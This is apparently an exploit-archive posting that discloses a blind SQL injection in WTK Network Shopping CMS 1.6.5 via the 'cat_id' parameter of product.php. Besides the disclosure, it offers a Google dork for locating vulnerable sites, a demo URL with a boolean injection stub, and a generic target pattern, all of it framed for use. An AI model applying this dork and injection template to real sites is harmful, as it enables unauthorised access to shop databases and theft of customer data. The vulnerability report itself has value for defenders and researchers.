WTK Network Shopping CMS version 1.6.5 suffers from a remote blind SQL injection vulnerability.
ccea99707df987dab4877138c65379cdb3e9108b4ff185e31d8e41c0d5248345
[*] Exploit Title: WTK Network Sql injection Vulnerability
[*] Google Dork: allinurl: "product.php?cat_id="
[*] Date: april, 11, 2015
[*] Exploit Author: ali ahmady From Iran
[*] Vendor Homepage: http://wtksoftware.com/
[*] Software Link: http://wtksoftware.com/clients/cart.php
[*] Version: 1.6.5
[*] Tested on: Linux
[*] demo : http://wtkdemo.com/unilevel_165_demo1/product.php?cat_id=1 AnD (true or false here)
WTK Network shopping CMS suffers from a Blind sql injection vulnerability
site.com/path/product.php?cat_id=BSQLi
proof: http://i.cubeupload.com/qQrf6D.png
http://i.cubeupload.com/hsQ70A.png
Greets : VIRkid, Phantom_x, b0x